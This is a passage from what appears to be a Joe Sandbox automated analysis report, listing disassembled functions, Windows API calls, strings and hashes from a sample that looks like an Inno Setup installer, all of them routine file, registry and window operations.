                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: DrawText$EmptyRect
                                                                                      • String ID:
                                                                                      • API String ID: 182455014-2867612384
                                                                                      • Opcode ID: dec825a9aee2c6b09e518825b83954473c9bd52475d7aaf62d715cc4f9536ee8
                                                                                      • Instruction ID: f2b81961a5c9452665bafda12c1e8f4b26a8e6b06f7f6a997a3587ccb4a7b75e
                                                                                      • Opcode Fuzzy Hash: dec825a9aee2c6b09e518825b83954473c9bd52475d7aaf62d715cc4f9536ee8
                                                                                      • Instruction Fuzzy Hash: 6B516171900248AFDB50DFA5C8C5BDEBBF9EF49308F08447AE845EB251D778A944CB64
                                                                                      Function 0042E9CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • 73A0A570.USER32(00000000,00000000,0042EB20,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042E9F6
                                                                                        • Part of subcall function 0041A158: CreateFontIndirectA.GDI32(?), ref: 0041A217
                                                                                      • SelectObject.GDI32(?,00000000), ref: 0042EA19
                                                                                      • 73A0A480.USER32(00000000,?,0042EB05,00000000,0042EAFE,?,00000000,00000000,0042EB20,?,?,?,?,00000000,00000000,00000000), ref: 0042EAF8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: A480A570CreateFontIndirectObjectSelect
                                                                                      • String ID: ...\
                                                                                      • API String ID: 2998766281-983595016
                                                                                      • Opcode ID: b314a03392ad466b231ea2b72e8a3a9b21c4fc795225b8958865863d61eb2cce
                                                                                      • Instruction ID: f87e9a1f05be7c7dd371759d08ccf2a788e9820b1ab6f676742360811e2f955b
                                                                                      • Opcode Fuzzy Hash: b314a03392ad466b231ea2b72e8a3a9b21c4fc795225b8958865863d61eb2cce
                                                                                      • Instruction Fuzzy Hash: 66315270B00128ABDF11EB9AD841BAEBBB8FF48304F91447BF410A7291D7789E45CA59
                                                                                      Function 004524C4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004915B5,_iu,?,00000000,004525FE), ref: 004525B3
                                                                                      • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004915B5,_iu,?,00000000,004525FE), ref: 004525C3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFileHandle
                                                                                      • String ID: .tmp$_iu
                                                                                      • API String ID: 3498533004-10593223
                                                                                      • Opcode ID: 0390d67cb0cdb1cdfe7b265348a3f126b325b0e84e7214b7738f97ac8063fbc8
                                                                                      • Instruction ID: e65077276ccf3fce125a3b1cef4711b6e1a57cb68d75bf9d1e013844d831b580
                                                                                      • Opcode Fuzzy Hash: 0390d67cb0cdb1cdfe7b265348a3f126b325b0e84e7214b7738f97ac8063fbc8
                                                                                      • Instruction Fuzzy Hash: CF31B870A40209ABCB11EBA5C942B9EBBB5AF45309F60447BF804B73C2E7785F05876D
                                                                                      Function 00416380 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetClassInfoA.USER32(00400000,?,?), ref: 004163EF
                                                                                      • UnregisterClassA.USER32(?,00400000), ref: 0041641B
                                                                                      • RegisterClassA.USER32(?), ref: 0041643E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Class$InfoRegisterUnregister
                                                                                      • String ID: @
                                                                                      • API String ID: 3749476976-2766056989
                                                                                      • Opcode ID: 5cbec8acbea9e71dae0b2083da7465dc5d1b6b33c382e5651f178c5e9f182fd1
                                                                                      • Instruction ID: e8561198b81c08f142b3a544c89b4739d35f798691a26b07e42a1fbbf62ba06a
                                                                                      • Opcode Fuzzy Hash: 5cbec8acbea9e71dae0b2083da7465dc5d1b6b33c382e5651f178c5e9f182fd1
                                                                                      • Instruction Fuzzy Hash: 94316E706042058BD760EF68C981B9B77E5AB88308F04447FF985DB392DB39D9448B6E
                                                                                      Function 004928CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNEL32(00000000,00493199,00000000,004929C2,?,?,00000000,00496628), ref: 0049293C
                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00493199,00000000,004929C2,?,?,00000000,00496628), ref: 00492965
                                                                                      • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0049297E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Attributes$Move
                                                                                      • String ID: isRS-%.3u.tmp
                                                                                      • API String ID: 3839737484-3657609586
                                                                                      • Opcode ID: ca7de64efd1a81cfe0b197b1df468b3a71946ac3222c8e5426d60e2b27b10d4a
                                                                                      • Instruction ID: f317836663e3456f6962b38be5478bf9a68de7f196930fcf54a7ed662431e31d
                                                                                      • Opcode Fuzzy Hash: ca7de64efd1a81cfe0b197b1df468b3a71946ac3222c8e5426d60e2b27b10d4a
                                                                                      • Instruction Fuzzy Hash: 682175B1E00219BFCF01EFA9C981AAFBBB8EF44314F10453BB814B72D1D6785E018A59
                                                                                      Function 00404D2A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                      • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExitMessageProcess
                                                                                      • String ID: Error$Runtime error at 00000000
                                                                                      • API String ID: 1220098344-2970929446
                                                                                      • Opcode ID: 8c8c0f2434a4a7f5450b7d1f87c82a5e4d49965682bc3ad0c70a84493f0d02f9
                                                                                      • Instruction ID: 7ca15834b35bf0f9f7e67f0c6f6a322a9a8b6c98d325c36795369cb21074e1e4
                                                                                      • Opcode Fuzzy Hash: 8c8c0f2434a4a7f5450b7d1f87c82a5e4d49965682bc3ad0c70a84493f0d02f9
                                                                                      • Instruction Fuzzy Hash: 9221B360A442418ADB11E7B9ECC1B163F919BE5348F06817BE700B73E6C67C884587AE
                                                                                      Function 00455014 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0042C6E0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C704
                                                                                        • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                        • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                      • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00455068
                                                                                      • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00455095
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                      • String ID: LoadTypeLib$RegisterTypeLib
                                                                                      • API String ID: 1312246647-2435364021
                                                                                      • Opcode ID: 10250a5388d3ee4e550ba31a3fe5ac1922547201747451197e41336d70963160
                                                                                      • Instruction ID: a0afcb3eee2e7d482a942a29ca59f5276f9681079562e2f4f26ed5ddc6a25d5d
                                                                                      • Opcode Fuzzy Hash: 10250a5388d3ee4e550ba31a3fe5ac1922547201747451197e41336d70963160
                                                                                      • Instruction Fuzzy Hash: B3119A30B00A04BFDB11DFA6DD61A5EBBBDDB49B05B108476FD00D3692DA399D04C654
                                                                                      Function 004912C2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 004912FB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window
                                                                                      • String ID: (PI$/INITPROCWND=$%x $@
                                                                                      • API String ID: 2353593579-723503215
                                                                                      • Opcode ID: 86e6223bfffcafd1a2f65b692b323bd489f5f98954c4b0d8703fa7141f283f5b
                                                                                      • Instruction ID: 1f11efd2ee19ddf28ed764c7ee5ed9f3dfbff071989b61bae05a2d8f1a94ab96
                                                                                      • Opcode Fuzzy Hash: 86e6223bfffcafd1a2f65b692b323bd489f5f98954c4b0d8703fa7141f283f5b
                                                                                      • Instruction Fuzzy Hash: 4611C071A082099FDB01EBA5D841BAEBFB8EB48304F50447BE804E7692D6789904CB58
                                                                                      Function 00473B54 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowkeyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                                      • GetFocus.USER32 ref: 00473BBF
                                                                                      • GetKeyState.USER32(0000007A), ref: 00473BD1
                                                                                      • WaitMessage.USER32(?,00000000,00473BF8,?,00000000,00473C1F,?,?,00000001,00000000,?,?,?,?,0047AFF7,00000000), ref: 00473BDB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: FocusMessageStateTextWaitWindow
                                                                                      • String ID: Wnd=$%x
                                                                                      • API String ID: 1381870634-2927251529
                                                                                      • Opcode ID: 148b3ddb7fb618247b6546acefc5128578639e1ec72ed586d201cbdf9417bc3e
                                                                                      • Instruction ID: 9b2db89c6fe012053fe9ee9db841d35393315fe18e075f30de14d411f09ec015
                                                                                      • Opcode Fuzzy Hash: 148b3ddb7fb618247b6546acefc5128578639e1ec72ed586d201cbdf9417bc3e
                                                                                      • Instruction Fuzzy Hash: A111A371604205AFC701FF65CC42ADEBBB8EB49704B51C4BAF408E7681D738AF00AA69
                                                                                      Function 004553F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045540D
                                                                                      • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045549F
                                                                                      Strings
                                                                                      • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00455439
                                                                                      • 4II, xrefs: 00455454
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: 4II$Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)
                                                                                      • API String ID: 3850602802-2462613993
                                                                                      • Opcode ID: 21981b69b3b60292a9e34021e10eefbd607064df05416549cbbf09db8aab2aab
                                                                                      • Instruction ID: b78d32421564deef5ec6d5e0726a4814eb3dcf40a391e8832c227d70dedd3d0b
                                                                                      • Opcode Fuzzy Hash: 21981b69b3b60292a9e34021e10eefbd607064df05416549cbbf09db8aab2aab
                                                                                      • Instruction Fuzzy Hash: 7411E5B1204240AFD700AB29AC81B6F7A9C9791309F05403FF9859F393D3794804C76A
                                                                                      Function 0046A538 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046A540
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046A54F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$LocalSystem
                                                                                      • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                      • API String ID: 1748579591-1013271723
                                                                                      • Opcode ID: 77c66de3cf485688cd8a454c74e7d13fa64a864e7151765c05c799678a767d6c
                                                                                      • Instruction ID: 3d329a02b99cf0ad1c2443f5a734abd9e2d9e95f88f8d85801cc299a54af140a
                                                                                      • Opcode Fuzzy Hash: 77c66de3cf485688cd8a454c74e7d13fa64a864e7151765c05c799678a767d6c
                                                                                      • Instruction Fuzzy Hash: 6111F8A040C3919ED340DF2AC44432BBAE4AB89704F04892FF9D8D6381E779C948DBB7
                                                                                      Function 00452A5A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00452A67
                                                                                        • Part of subcall function 00406EB8: DeleteFileA.KERNEL32(00000000,00496628,00492DAD,00000000,00492E02,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EC3
                                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 00452A8C
                                                                                        • Part of subcall function 004520A4: GetLastError.KERNEL32(00000000,00452B15,00000005,00000000,00452B4A,?,?,00000000,00496628,00000004,00000000,00000000,00000000,?,00492A61,00000000), ref: 004520A7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesDeleteErrorLastMove
                                                                                      • String ID: DeleteFile$MoveFile
                                                                                      • API String ID: 3024442154-139070271
                                                                                      • Opcode ID: cba485c4373cb9b3476474b8e686bddda4e38f58d72cb5e4c066a25f76e66c5c
                                                                                      • Instruction ID: f8b9d45963fbba9a2c353dd22a61e6c6557ef6b5226e77028bb226458c331aba
                                                                                      • Opcode Fuzzy Hash: cba485c4373cb9b3476474b8e686bddda4e38f58d72cb5e4c066a25f76e66c5c
                                                                                      • Instruction Fuzzy Hash: 32F036757141055BE704FFA6DA5266F63ECEF4530AFA0443BB800B76C3EA7C9E094929
                                                                                      Function 0047E330 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 0047E371
                                                                                      • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 0047E394
                                                                                      Strings
                                                                                      • CSDVersion, xrefs: 0047E368
                                                                                      • System\CurrentControlSet\Control\Windows, xrefs: 0047E33E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                      • API String ID: 3677997916-1910633163
                                                                                      • Opcode ID: 0901654d9ab6cc44d6c913291a9ded88af89d372fc2709b86358ce193460f02c
                                                                                      • Instruction ID: 8efd12000c89c59f245f9e1a1bb94511b09fbcc5fab7c17f0dd19fd863842872
                                                                                      • Opcode Fuzzy Hash: 0901654d9ab6cc44d6c913291a9ded88af89d372fc2709b86358ce193460f02c
                                                                                      • Instruction Fuzzy Hash: EFF03675A40209E6DF10D6E28C45BDF77BCAB08708F1086A7EE14E7280E7789A44CB59
                                                                                      Function 00457B28 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00457C5A,00000000,00457DA7,?,00000000,00000000,00000000), ref: 00457B75
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpen
                                                                                      • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                      • API String ID: 47109696-2631785700
                                                                                      • Opcode ID: 23cb1f2033dc3865c53e7f2342fb28a5b001a15c0a0e235066296095a06ac94b
                                                                                      • Instruction ID: d0e0819fb55c8f1190b2a98828cf62c2b63c39478ea79f7c0b5f5cfc857af762
                                                                                      • Opcode Fuzzy Hash: 23cb1f2033dc3865c53e7f2342fb28a5b001a15c0a0e235066296095a06ac94b
                                                                                      • Instruction Fuzzy Hash: 0DF0AF317041205BC710EB1AF851B4A6689DB9131AF54403BF980D7256D77DEC0A875A
                                                                                      Function 0042D7CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00452762,00000000,00452805,?,?,00000000,00000000,00000000,00000000,00000000,?,00452AD1,00000000), ref: 0042D7E6
                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D7EC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                      • API String ID: 1646373207-4063490227
                                                                                      • Opcode ID: 159a61d3abceb67132d836cbc908e23cdc840a77e135d0af2cc19f2b4bcaaff8
                                                                                      • Instruction ID: 4db8f333c9a0d948aa4d288d669557f69a64c6eaa67e0ad6c3f7b03414b73d9c
                                                                                      • Opcode Fuzzy Hash: 159a61d3abceb67132d836cbc908e23cdc840a77e135d0af2cc19f2b4bcaaff8
                                                                                      • Instruction Fuzzy Hash: 23E04F61B44B1112D7107ABA9C83A5B10898B88724FA0843B79A5E72C7EDBCD94A1A7D
                                                                                      Function 0042E87C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042E7F8), ref: 0042E88A
                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E890
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                      • API String ID: 1646373207-260599015
